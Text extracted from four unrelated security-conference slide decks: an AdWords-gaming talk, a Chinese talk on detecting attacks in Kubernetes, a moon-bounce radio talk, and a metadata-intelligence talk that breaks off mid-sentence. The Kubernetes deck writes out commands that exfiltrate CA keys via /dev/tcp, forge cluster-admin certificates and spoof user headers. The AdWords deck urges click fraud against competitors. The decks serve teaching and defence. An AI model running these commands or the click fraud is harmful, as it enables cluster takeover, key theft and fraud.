Hacking Google AdWords “Don’t be evil my ass” By: StankDawg What is Google AdWords? • Google Advertising Program – Pay Per Click – Customizable – Used by: • Gmail • Google Groups • Adsense • etc… How does it work? • 20 bucks up front – $5 activation fee – $15 Credit towards account • Pay per click – Bidding system • Minimum .05 • Maximum daily value can be set • Higher bids = better results How does it work? • Campaigns – Logical Units – Multiple campaigns for webmasters of multiple sites • Ad Groups – Many inside each campaign. – Examples: • Cars (One ad for NEW, one ad for USED) • My site (One for Radio, one for Magazine, etc…) What’s the problem? • Reactivation fees – “Slowed” accounts • Without warnings! • 2 grace violations, then $5 fee • Terms of Service – No Hacking or Cracking • They do not differentiate between H/C • Hypocrisy – Hacking is invalid yet “Define:Hacker” on Google gives many correct definitions. – Keyword tool suggest invalid keywords! – I can’t advertise Hacking, but ebay and Amazon can! – Google may ban “hacker” but other sites that are powered by their AdWords engine DO NOT! What can you do? • Reactivate your ads – Ads are put into rotation immediately! – Modify your ads by making one small change – Delete the keywords then Add them back! • Daily limit – Click the hell out of ads of sites you don’t like (using proxies and/or scripts) – Use words that you know are invalid Tricks! • Misspellings – Get hits before the real ads! – Cheaper (.05 minimum) Tricks! • Use proper names – Coke use Pepsi, Ford use Chevrolet, etc… Tricks! • Use general Google hacking techniques • Bust anyone who is “Google hacking”! Other Interesting Applications • Passing hidden messages? – 80 character limit to keywords • Public key? • Secret key only for the person who knows what to find. • And yes, there is a hidden message there. ;) Other Interesting Applications • Misleading People Other Interesting Applications • Misleading People Other Interesting Applications • Never piss off a hacker! Other Interesting Applications • Never piss off a hacker! Other Interesting Applications • Never piss off a hacker! Parting ideas – The actual Ad can carry more 411 • URL for more 411. • Steganography in ad? – Gaming AdSense with AdWords 411 • Displaying high paying keywords = $$$ per click. • Drawback: sleazy! (but surprisingly common) Closing • Shoutz – The DDP! – The Binary Revolution at http://www.binrev.com/ – DC305, FL2600. – The internet guy from whom I stole this template. • Beware of Google! “The Revolution Will Be Digitized!”
KUBERNETES中的异常活动检测 About me 0 1 @9ian1i 朱思宇 blue teamer,⼊侵对抗,业余安全开发,阿⾥云融媒体安全。 DEFCON Blue Team Village,Black Hat Arsenal 演讲者。 WatchAD – AD Security Intrusion Detection System crawlergo – A powerful browser crawler for web vulnerability scanners ??? - kubernetes abnormal activity detection and blocking system 开源安全项⽬: 安全⻛险 安全防护 K8S安全⻛险与防护现状 0 2 Threat matrix for Kubernetes 0 3 K8S安全防护现状 *检测能⼒数据来⾃各家官⽅⽹站⽂档 https://docs.microsoft.com/en-us/azure/security-center/alerts-reference#alerts-k8scluster https://help.aliyun.com/document_detail/191144.html#title-seo-no0-8zv Alibaba Cloud Google Cloud Azure Cloud 0 AWS Cloud 0 7 云⼚商 15 K8S集群异常活动检测项数量 具备相关能⼒的国外安全⼚商 除了云⼚商,国内普遍对K8S安全防护关注不够,还停留在基线加固阶段 04 检测与对抗 05 Architecture based of audit logs detection 0 6 UI User Interface CLI Command Line interface API Server Master Audit Log Logtail Agent MQ Threat Analytics Alerts for suspicious activities Node 1 Node 2 Node n 0 7 About k8s auditing *审计策略格式样例 k8s审计事件⽇志可记录访问API Server的所有请求,配合 审计策略设置,能记录请求与响应的详细数据。 每个Master节点上的审计⽇志并不会相互同步,需要收集 所有Master节点。 它能记录下⾯三个关键问题: • ⽤户身份与授权信息 • 请求的操作与资源详情 • 请求的结果与响应 0 8 User Interface Master etcd API Server Control- manager scheduler ns default-token-xxxxx sa-token-xxxxx other-token-xxxxx Host Secrets Node Pod Pod Compromised container Web App Access API Server Master A Master B Master N API Server API Server API Server 负载 均衡 6443 8080 容器集群渗透⼯具 匿名登录尝试 集群信息探 测 0 9 SA Suspicious Activity 通过对SA进⾏⾏为学习记录,建⽴操作基线,超出则告警。 1 0 Honeypot Account ns Node Secrets default-token-xxxxx normal-sa-token-xxxxx fake-admin-token-xxxxx ... Pod A Pod B Host OS file: ~/.kube/kubeconfig 投放 蜜饵账户 ... 1 1 About k8s RBAC 1 2 Privilege Escalation – RBAC rolebinding/bind hacker API Server Create rolebinding auditing normal account cluster-admin role admin privileges account 1 3 Privilege Escalation – RBAC createpod and SA bind hacker createpod privilege create pod req API Server pod send token Get admin JWT token 1 4 Certificate Authentication = Golden Ticket ? UI User Interface K8S的重要认证⼏乎都依赖客户端证书机制,三套CA证书与私钥是认证体系的安全核⼼ 1 5 Golden Ticket – Client Certificate apiVersion: v1 kind: Pod metadata: name: get-crt-key namespace: kube-system spec: hostIPC: true nodeName: master volumes: - name: k8s hostPath: path: /etc/kubernetes/ containers: - image: centos:7 name: centos command: ["/bin/bash"] args: ["-c", "command"] volumeMounts: - mountPath: "/etc/kubernetes" name: k8s 如何⽣成⼀张超级管理员⾦票? 第⼀步:窃取API Server的CA证书和私钥,并发送到远程服务器 hacker create pod req 读取并发送CA证书 ps -aux | grep kube-apiserver | awk 'BEGIN{i=1}{gsub(/\s/,"\n");i++;print}' | grep '\-\-client-ca-file' | awk -F= '{print $2}'| xargs cat > /dev/tcp/your_ip/port 读取并发送CA私钥 ps -aux | grep kube-controller-manager | awk 'BEGIN{i=1}{gsub(/\s/,"\n");i++;print}' | grep '\-\-cluster-signing-key-file' | awk -F= '{print $2}'| xargs cat > /dev/tcp/your_ip/port 1 6 第⼆步:使⽤CA私钥与证书,本地签发cluster-admin证书 Golden Ticket – Client Certificate cluster-admin ⽣成个⼈私钥 openssl genrsa -out admin.key 2048 ⽣成cluster-admin⽤户,masters组的证书请求 openssl req -new -key admin.key -out admin.csr -subj "/CN=cluster-admin/O=system:masters" ⽤上述⽣成的证书请求,签发⾦票证书,有效期10年 openssl x509 -req -in admin.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out admin.crt -days 3650 1 7 Golden Ticket – User Forgery 如何⽣成⼀张任意⽤户(即使不存在)的⾦票? 第⼀步:窃取requestheader的CA证书和私钥,查询 , 并发送到远程服务器。 —requestheader-allowed-names hacker create pod req apiVersion: v1 kind: Pod metadata: name: get-crt-key namespace: kube-system spec: hostIPC: true nodeName: master volumes: - name: k8s hostPath: path: /etc/kubernetes/ containers: - image: centos:7 name: centos command: ["/bin/bash"] args: ["-c", "command"] volumeMounts: - mountPath: "/etc/kubernetes" name: k8s 读取并发送CA证书 ps -aux | grep kube-apiserver | awk 'BEGIN{i=1}{gsub(/\s/,"\n");i++;print}' | grep '\-\-requestheader- client-ca-file' | awk -F= '{print $2}'| xargs cat > /dev/tcp/your_ip/port 读取并发送CA私钥 cat /etc/kubernetes/pki/front-proxy-ca.key > /dev/tcp/your_ip/port 读取并发送 requestheader-allowed-names ps -aux | grep kube-apiserver | awk 'BEGIN{i=1}{gsub(/\s/,"\n");i++;print}' | grep '\-\-requestheader- allowed-names' | awk -F= '{print $2}'> /dev/tcp/your_ip/port CA私钥 CA证书 requestheader-allowed-names front-proxy-client 1 8 hacker Golden Ticket – User Forgery 第⼆步:使⽤requestheader的CA私钥与证书,本地签发指定⽤户证书 ⽣成个⼈私钥 openssl genrsa -out user.key 2048 ⽣成 CN=front-proxy-client 证书请求 openssl req -new -key user.key -out user.csr -subj "/CN=front-proxy-client" ⽤上述⽣成的证书请求,签发证书,有效时间10年 openssl x509 -req -in user.csr -CA front-proxy-ca.crt -CAkey front-proxy-ca.key -CAcreateserial -out user.crt -days 3650 第三步:使⽤该证书发起请求,伪造任意⽤户 curl -ki --cacert front-proxy-ca.crt --key siyu.key --cert siyu.crt -H 'X-Remote-Group: system:masters' -H 'X-Remote-User: hacker' 1 9 Defense Evasion remove audit log settings set --allow-privileged=true set --insecure-port=9443 set --secure-port=9444 set --anonymous-auth=true set --authorization-mode=AlwaysAllow dump create update kube-apiserver- xxx.yaml Shadow API Server 2 0 怎么优化? 已知问题: • 存在攻击⼿法可绕过K8S审计事件⽇志。 • 当前架构只能事后审计检测,⽆法实时阻断。 • 对于⾮云环境,⼤规模⽇志实时消费对于基础设施有⼀定要求。 除了审计事件⽇志,我们还能从什么地⽅进⾏检测? 2 1 Validating admission webhook 2 2 Architecture UI User Interface CLI Command Line interface API Server Master Alerts for suspicious activities Node 1 Node 2 Node n Mutating Webhooks Validating Webhooks etcd Threat Analytics Threat Analytics By audit log Dynamic Admission Control 2 3 Dynamic Admission Control { "apiVersion": "admission.k8s.io/v1beta1", "kind": "AdmissionReview", "request": { "uid": "705ab4f5-6393-11e8-b7cc-42010a800002", "kind": { "group": "autoscaling", "version": "v1", "kind": "Scale" }, "resource": { "group": "apps", "version": "v1", "resource": "deployments" }, "subResource": "scale", "requestKind": { "group": "autoscaling", "version": "v1", "kind": "Scale" }, "requestResource": { "group": "apps", "version": "v1", "resource": "deployments” ... ... API Server // 遍历启动参数 查找⻛险项 for _, container := range pod.Spec.Containers { for _, cmd := range container.Command { if util.SliceFindStr(riskCmd, cmd) { // 发现⻛险启动命令 vulCmdList = append(vulCmdList, cmd) } } // 查找是否开启了审计⽇志,未找到则告警 for _, prefix := range auditSettingPrefix { if !util.SlicePrefixFind(container.Command, prefix) { missingAuditSettings = append(missingAuditSettings, prefix) } } } AdmissionReview Request All Requests Operations that need to be persisted to etcd 2 4 No coding , More Cloud Native Gatekeeper https://github.com/open-policy-agent/gatekeeper https://github.com/open-policy-agent/opa OPA kube-mgmt apiVersion: constraints.gatekeeper.sh/v 1beta1 kind: K8sRequiredLabels metadata: name: ns-must-have-gk spec: match: kinds: - apiGroups: [""] kinds: ["Namespace"] parameters: labels: ["gatekeeper"] CLI Command Line interface API Server Validating Webhooks etcd 2 5 End K8S中⼼化管理带来的便捷,就会带来对应的安全⻛险,同时放⼤安全影响。 传统基于主机的防御架构和思路,在云原⽣环境上会明显⽔⼟不服。 • 传统环境注重横向移动,更多的在应⽤层寻找突破⼝。 • 云原⽣安全中,作为关键基础设施的K8S集群最为重要,攻击会更多的围绕拿下集群管理权限, 从⽽接管整个集群,控制所有机器。 @9ian1i @Qianlitp 9ian1itp@gmail.com 阿⾥云融媒体安全持续招聘⼊侵对抗、⻛控、应⽤安全、安全研发。 2 6 M A N O E U V R E 感谢观看! KCon 汇聚⿊客的智慧
DCFluX in: Moon-Bouncer DCFluX in: Moon-Bouncer Presented By: Matt Krick, DCFluX – K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 18; Las Vegas, NV Track 4 Friday July 30, 2010; 17:00 – 17:50 In A.D. 2101 War Was Beginning Hidden Agenda 1. A Series of Tubes 2. Natural Satellites and Moon Bouncing 3. Artificial Satellites and cleaver ways to use them 0. About the Author 5. Other stuff you can blame me for 4. Weather balloons as satellites • Matt Krick • “DCFluX” • Video Editor • Broadcast Engineer – 1998 to Present • K3MK – Licensed to Transmit, 1994 to Present 0. About the Author 0. About the Author Triodes and Tetrodes 1. A Series of Tubes Magnetron (Radar Type) 1. A Series of Tubes Magnetron (Radar Type) Magnet 1. A Series of Tubes Magnetron (Microwave Oven Type) 1. A Series of Tubes Klystron Tube 1. A Series of Tubes Klystron Tube (Reflex) 1. A Series of Tubes Traveling Wave Tube 1. A Series of Tubes Traveling Wave Tube Amplifier 1. A Series of Tubes Hydrogen MASER 1. A Series of Tubes Hydrogen MASER 1. A Series of Tubes 2. Natural Satellites and Moon Bouncing 2. Natural Satellites and Moon Bouncing Earth’s Moon • Diameter: 3,474.2 km 2. Natural Satellites and Moon Bouncing Project Diana • Frequency: 111.50 MHz Perigee Apogee 40m (7 MHz) 230.5 dB 232.7 dB 10m (30 MHz) 242.5 dB 244.8 dB 6m (54 MHz) 247.5 dB 249.8 dB 2m (148 MHz) 256.7 dB 259.0 dB 70cm (450 MHz) 266.0 dB 268.3 dB 33cm (928 MHz) 272.6 dB 274.9 dB 23cm (1.3 GHz) 275.4 dB 277.7 dB 13cm (2.45 GHz) 281.2 dB 283.4 dB 3cm (10.5 GHz) 294.0 dB 296.2 dB 2. Natural Satellites and Moon Bouncing Moon Bounce Path Attenuation • 8000 W Transmitter (+69 dBm) • 111.5 MHz EME Path (-256.7 dB) • 64 Dipole Array (+24 dB) • Feed Line Loss (-4.2 dB) 69 + 24 - 4.2 - 256.7 + 24 – 4.2 = -148.1 dBm 2. Natural Satellites and Moon Bouncing Project Diana Path Loss 2. Natural Satellites and Moon Bouncing Increasing Receiver Sensitivity • Decrease Thermal Noise • Decrease Bandwidth • Decrease System Noise Figure 2. Natural Satellites and Moon Bouncing Project Diana Receiver • Receiver Bandwidth: 57 Hz 70° F ( 294.3° K ) -321° F ( 77° K ) -457° F ( 1° K ) 0.01 Hz -194.0 dBm -210.0 dBm -218.0 dBm 0.1 Hz -184.0 dBm -200.0 dBm -208.0 dBm 1 Hz -174.0 dBm -190.0 dBm -198.0 dBm 10 Hz -164.0 dBm -180.0 dBm -188.0 dBm 500 Hz -147.0 dBm -163.0 dBm -171.0 dBm 3 kHz -139.2 dBm -155.2 dBm -163.2 dBm 16 kHz -132.0 dBm -148.0 dBm -156.0 dBm 1 MHz -114.0 dBm -130.0 dBm -138.0 dBm 22 MHz -100.0 dBm -116.0 dBm -124.0 dBm 2. Natural Satellites and Moon Bouncing Sensitivity vs. Bandwidth and Temperature 2. Natural Satellites and Moon Bouncing Project Diana Receiver Sensitivity • -174 dBm per Hz at 70° F • 10 log10 bandwidth (57 Hz = 17.6 dB) • 7 dB Receiver Noise Figure -174 + 17.6 + 7 = -149.4 dBm 2. Natural Satellites and Moon Bouncing Project Diana Returned Echo 2. Natural Satellites and Moon Bouncing Communication Moon Relay 2. Natural Satellites and Moon Bouncing Communication Moon Relay 2. Natural Satellites and Moon Bouncing Communication Moon Relay Minimum Maximum SSCW (Morse Code) 0.1 Hz 20 Hz CW (Morse Code) 20 Hz 150 Hz RTTY 270 Hz 370 Hz PSK31 - 37.5 Hz JT65A - 177.6 Hz Side Band Phone 2.4 kHz 3 kHz AM Phone 5 kHz 10 kHz Narrower Band FM Phone - 8 kHz Narrow Band FM Phone - 16 kHz 2. Natural Satellites and Moon Bouncing Bandwidth of Popular Modes • 10W Transmitter (+40 dBm) • Receiver Pre Amplifier (+12dB) • 928 MHz EME Path (-274.9 dB) • 15’ Parabolic Dish (+30 dB) • Feed Line Loss (-0.5 dB) 40 + 30 - 0.5 – 274.9 + 30 - 0.5 + 12 -163.9 dBm 2. Natural Satellites and Moon Bouncing 900 MHz WiFi Moon Bounce? • 10W Amplifier (+40 dBm) • Receiver Pre Amplifier (+12dB) • 928 MHz x 405,696 km (-204 dB) • 15’ Parabolic Dish (+30 dB) • Feed Line Loss (-0.5 dB) 40 + 30 - 0.5 - 204 + 30 + 12 - 0.5 -93 dBm 2. Natural Satellites and Moon Bouncing 900 MHz WiFi One Way? 2. Natural Satellites and Moon Bouncing 900 MHz WiFi One Way? • 1W Amplifier (+30 dBm) • Receiver Pre Amplifier (+12 dB) • 2.45 GHz EME Path (-283.4 dB) • Arecibo Dish (+75 dB) • Feed Line Loss (-1 dB) 30 + 75 - 1 - 283.4 + 75 +12 - 1 -93.4 dBm 2. Natural Satellites and Moon Bouncing 802.11b/g Moon Bounce 2. Natural Satellites and Moon Bouncing 802.11b/g Moon Bounce 2. Natural Satellites and Moon Bouncing Frickin’ Laser Beams 2. Natural Satellites and Moon Bouncing Frickin’ Laser Beams 2. Natural Satellites and Moon Bouncing Frickin’ Laser Beams 2. Natural Satellites and Moon Bouncing Frickin’ Laser Beams • 1500 W Transmitter (+61.8 dBm) • Receiver Pre Amplifier (+24 dB) • 144 MHz EME Path (-259 dB) • 17 Element Yagi (+18 dB) • Feed Line Loss (-0.5 dB) 61.8 + 18 - 0.5 - 259 + 18 + 24 - 0.5 -138.2 dBm 2m Moon Bounce 2. Natural Satellites and Moon Bouncing 2m 48 Yagi Phased Array 2. Natural Satellites and Moon Bouncing Typical Microwave Oven 2. Natural Satellites and Moon Bouncing Typical Microwave Oven 2. Natural Satellites and Moon Bouncing Phase Locked Microwave Oven 2. Natural Satellites and Moon Bouncing Injection Locked Microwave Oven 2. Natural Satellites and Moon Bouncing • 750W Microwave Oven (+59 dBm) • Receiver Pre Amplifier (+12 dB) • 2.45 GHz EME Path (-283.4 dB) • 12’ Parabolic Dish (+36.4 dB) • Feed Line Loss (-0.5 dB) 59 + 36.4 - 0.5 - 283.4 + 36.4 + 12 - 0.5 -140.6 dBm 13cm Moon Bounce 2. Natural Satellites and Moon Bouncing Surplus Parabolic Dishes 2. Natural Satellites and Moon Bouncing Surplus Parabolic Dishes 2. Natural Satellites and Moon Bouncing Surplus Parabolic Dishes 2. Natural Satellites and Moon Bouncing Surplus Parabolic Dishes 2. Natural Satellites and Moon Bouncing Surplus Parabolic Dishes 2. Natural Satellites and Moon Bouncing Highest Usable Frequency 2.00” 590 MHz 1.50” 790 MHz 1.00” 1.18 GHz 0.750” 1.57 GHz 0.500” 2.36 GHz 0.375” 3.15 GHz 0.250” 4.72 GHz 0.125” 9.45 GHz 0.0625” 18.9 GHz My Dish Has Holes In It 2. Natural Satellites and Moon Bouncing Sputnik 1 3. Artificial Satellites and cleaver ways to use them Dogs in Space (Sputnik 2) 3. Artificial Satellites and cleaver ways to use them Dogs in Space (Sputnik 6) 3. Artificial Satellites and cleaver ways to use them ECHO-1A 3. Artificial Satellites and cleaver ways to use them Syncom 3 • 180° West • 7360 MHz Uplink • 1815 MHz Downlink • 1- 5 MHz Channel • 1 - 13 MHz Channel 3. Artificial Satellites and cleaver ways to use them • Apogee: 818.00 • Perigee: 696.00 • Inclination: 99.97 • Period: 99.97 • Uplinks – 2 m & 23 cm • Downlinks – 70 cm & 13 cm AMSAT-OSCAR 51 (Echo) 3. Artificial Satellites and cleaver ways to use them • 89° West • 22 C Band • 36 Ku Band • 24 Ka Band Telstar 28 (S2205) 3. Artificial Satellites and cleaver ways to use them Linear Transponder 3. Artificial Satellites and cleaver ways to use them Ku Band Coverage (S2205) 3. Artificial Satellites and cleaver ways to use them Average C Band Downlink (4.2 GHz) 196.3 dB C Band Uplink (6.4 GHz) 200.0 dB Ku Band Downlink (12.2 GHz) 205.5 dB Ku Band Uplink (14.5 GHz) 207.0 dB Ka Band Downlink Gateway (18.8 GHz) 209.3 dB Ka Band Downlink VSAT (20.2 GHz) 209.9 dB Ka Band Uplink Gateway (28.6 GHz) 212.9 dB Ka Band Uplink VSAT (30 GHz) 213.4 dB Satellite Path Attenuation 3. Artificial Satellites and cleaver ways to use them Ka Band VSAT Transmitter 3. Artificial Satellites and cleaver ways to use them Ka Band VSAT Transmitter 3. Artificial Satellites and cleaver ways to use them Spaceway 3 (S2663) 3. Artificial Satellites and cleaver ways to use them Spot Beam Reflector 3. Artificial Satellites and cleaver ways to use them Spot Beam Input Tubes 3. Artificial Satellites and cleaver ways to use them • Meteorites • Solar Flares • Leaking Capacitors • Exploding Batteries • Tin Whiskers Taking Down Satellites (Natural Causes) 3. Artificial Satellites and cleaver ways to use them • China – Modified Ballistic Missiles • United States – Modified Surface to Air Missiles – Frickin’ Laser Beams • Russia – 23 mm Cannon – Weather Satellites Taking Down Satellites (Government Intervention) 3. Artificial Satellites and cleaver ways to use them Taking Down Satellites (Home Edition) Frequency Frequency Emission Emission Profit! Profit! 3701 MHz 5926.5 MHz 29.9995 GHz 500KG1D ???? Parking Orbit Vanned Atmosphere Reentry 20.198 GHz 500KF1D 3. Artificial Satellites and cleaver ways to use them Jet Stream 4. Weather balloons as satellites • WRT54GL – 200 mW (+23 dBm) – 9 dB Antenna – 8 GB Secure Digital Card • 32’ Latex Balloon – Altitude Station Keeping System • GPS & TinyTrak-4 – 144.39 MHz APRS – Provides Altitude Information Example Payload 4. Weather balloons as satellites 2.4 GHz at 2 m Altitude 4. Weather balloons as satellites 2.4 GHz at 18000 m Altitude 4. Weather balloons as satellites 2.4 GHz at 25000 m Altitude 4. Weather balloons as satellites Repeater Desense Generator 5. Other stuff you can blame me for Microwave Oven 802.11b/g Jammer 5. Other stuff you can blame me for Questions? Questions? matt@kgmn.net Track 4 Q&A Room Track 4 Q&A Room DCFluX in: Moon-Bouncer DCFluX in: Moon-Bouncer DCFluX will return in: DCFluX will return in: License to Transmit License to Transmit
APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Michael Schrenk Las Vegas, Nevada @mgschrenk DEF CON XXIII DEF CON XXIII APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there IN ADDITION TO OTHER EXAMPLES Retail business my girlfriend & I own How we CREATE and APPLY intelligence APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there IN ADDITION TO OTHER EXAMPLES Retail business my girlfriend & I own How we CREATE and APPLY intelligence APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there You'll hear how we use competitive intelligence to: 1.) Conduct intelligence campaigns on a. Our competitors b. Our sales channels 2.) Know exactly what inventory to buy 3.) Manipulate markets Protect Our Investment Protect Our Investment APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there INTELLIGENCE BUSINESS COMPETITIVE APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there INTELLIGENCE BUSINESS COMPETITIVE - What's happing within your business? - Internal data - Focus on efficiency a.) knowing operations b.) knowing resources - What's happening outside of your business? - External data - Focus on competitiveness a.) knowing competitors b.) knowing markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there INTELLIGENCE BUSINESS COMPETITIVE - What's happing within your business? - Internal data - Focus on efficiency a.) knowing operations b.) knowing resources - What's happening outside of your business? - External data - Focus on competitiveness a.) knowing competitors b.) knowing markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there INTELLIGENCE BUSINESS COMPETITIVE - What's happing within your business? - Internal data - Focus on efficiency a.) knowing operations b.) knowing resources - What's happening outside of your business? - External data - Focus on competitiveness a.) knowing competitors b.) knowing markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there INTELLIGENCE BUSINESS COMPETITIVE - What's happing within your business? - Internal data - Focus on efficiency a.) knowing operations b.) knowing resources - What's happening outside of your business? - External data - Focus on competitiveness a.) knowing competitors b.) knowing markets APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Applied Intelligence Actionable Intelligence = APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there 1.) If it won't change what you're doing it isn't useful 2.) Organizations tend to over collect a.) Higher cost b.) Increased exposure 3.) Intel is collected for obligatory reasons MUCH INTELLIGENCE IS USELESS APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there MUCH INTELLIGENCE IS USELESS 1.) If it won't change what you're doing it isn't useful 2.) Organizations tend to over collect a.) Higher cost b.) Increased exposure 3.) Intel is collected for obligatory reasons APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there MUCH INTELLIGENCE IS USELESS 1.) If it won't change what you're doing it isn't useful 2.) Organizations tend to over collect a.) Higher cost b.) Increased exposure 3.) Intel is collected for obligatory reasons APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Collected: Access time IP Addresses Frequency accessed (cookie) User Agent Referrer APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there TIME TRACK 01 TRACK 02 TRACK 03 TRACK 04 DEFCON 101 01:00 PM 02:00 PM 03:00 PM 04:00 PM 05:00 PM APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there TIME TRACK 01 TRACK 02 TRACK 03 TRACK 04 DEFCON 101 01:00 PM 02:00 PM 03:00 PM 04:00 PM 05:00 PM Information (in aggregate) could predict talk popularity and affect planning APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Information that isn't there = Meta data APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta data The public did not know much about meta data before the Snowden disclosures Edward Snowden APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there "As you know, this is just meta data. There is no content involved." Dianne Feinstein June 6, 2013 Intelligence Comm. Briefing APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Barack Obama, on NSA Surveillance June 7, 2014 “Nobody is listening to your telephone calls. That’s not what this program is about...” They’re not looking at names and they’re not looking at content, but sifting through this so-called meta data...” APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Barack Obama, on NSA Surveillance June 7, 2014 “Nobody is listening to your telephone calls. That’s not what this program is about...” They’re not looking at names and they’re not looking at content, but sifting through this so-called meta data...” $sql = “ sift(*) from phone_records where person = 'suspect' ”; APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there "We kill people based on meta data." Former NSA Boss, Michael Hayden May 11, 2014 Johns Hopkins University APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta data: 1.) Describes other data 2.) Provides context for information 3.) It often doesn't exist & it needs to be created. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta data: 1.) Describes other data 2.) Provides context for information 3.) It often doesn't exist & it needs to be created. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta data: 1.) Describes other data 2.) Provides context for information 3.) It often doesn't exist & it needs to be created. APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta data types 1.) Parametric must be collected / created 2.) Embedded user created APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta data types 1.) Parametric must be collected / created 2.) Embedded user created APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta Data: Embedded XIF Geo-Codes leaked that Russian soldiers were in Ukraine APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta Data: Embedded The Tony Blair memo Justification for invading Iraq APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta Data: Embedded APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Meta Data: Embedded Google CEO, Eric Schmidt, leaked the existence of new project “Google Drive” APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there How the NSA uses Parametric Meta Data APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Phone meta data collected by the NSA*: 1.) Phone numbers of parties 2.) The time the call was placed 3.) The duration of the call 4.) Who initiated the call *https://www.nsa.gov/public_info/_files/speeches_testimonies/2013_08_09_the_nsa_story.pdf APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Phone meta data collected by the NSA*: 1.) Phone numbers of parties 2.) The time the call was placed 3.) The duration of the call 4.) Who initiated the call *https://www.nsa.gov/public_info/_files/speeches_testimonies/2013_08_09_the_nsa_story.pdf APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Phone meta data collected by the NSA*: 1.) Phone numbers of parties 2.) The time the call was placed 3.) The duration of the call 4.) Who initiated the call *https://www.nsa.gov/public_info/_files/speeches_testimonies/2013_08_09_the_nsa_story.pdf APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Phone meta data collected by the NSA*: 1.) Phone numbers of parties 2.) The time the call was placed 3.) The duration of the call 4.) Who initiated the call *https://www.nsa.gov/public_info/_files/speeches_testimonies/2013_08_09_the_nsa_story.pdf APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there Phone meta data collected by the NSA*: 1.) Phone numbers of parties 2.) The time the call was placed 3.) The duration of the call 4.) Who initiated the call *https://www.nsa.gov/public_info/_files/speeches_testimonies/2013_08_09_the_nsa_story.pdf The NSA does what any Android app is capable of doing APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there With this meta data: 1.) Caller relationships are established 2.) These relationships can be profiled 3.) Anomalies and outliers are identified 4.) “Burner phones” are identified 5.) Phone patterns can be tied to other events APPLIED INTELLIGENCE: APPLIED INTELLIGENCE: Using information that isn't there Using information that isn't there With this meta data: 1.) Caller relationships are established 2.) These relationships can be profiled 3.) Anomalies and outliers are identified 4.) “Burner phones” are identified 5.) Phone 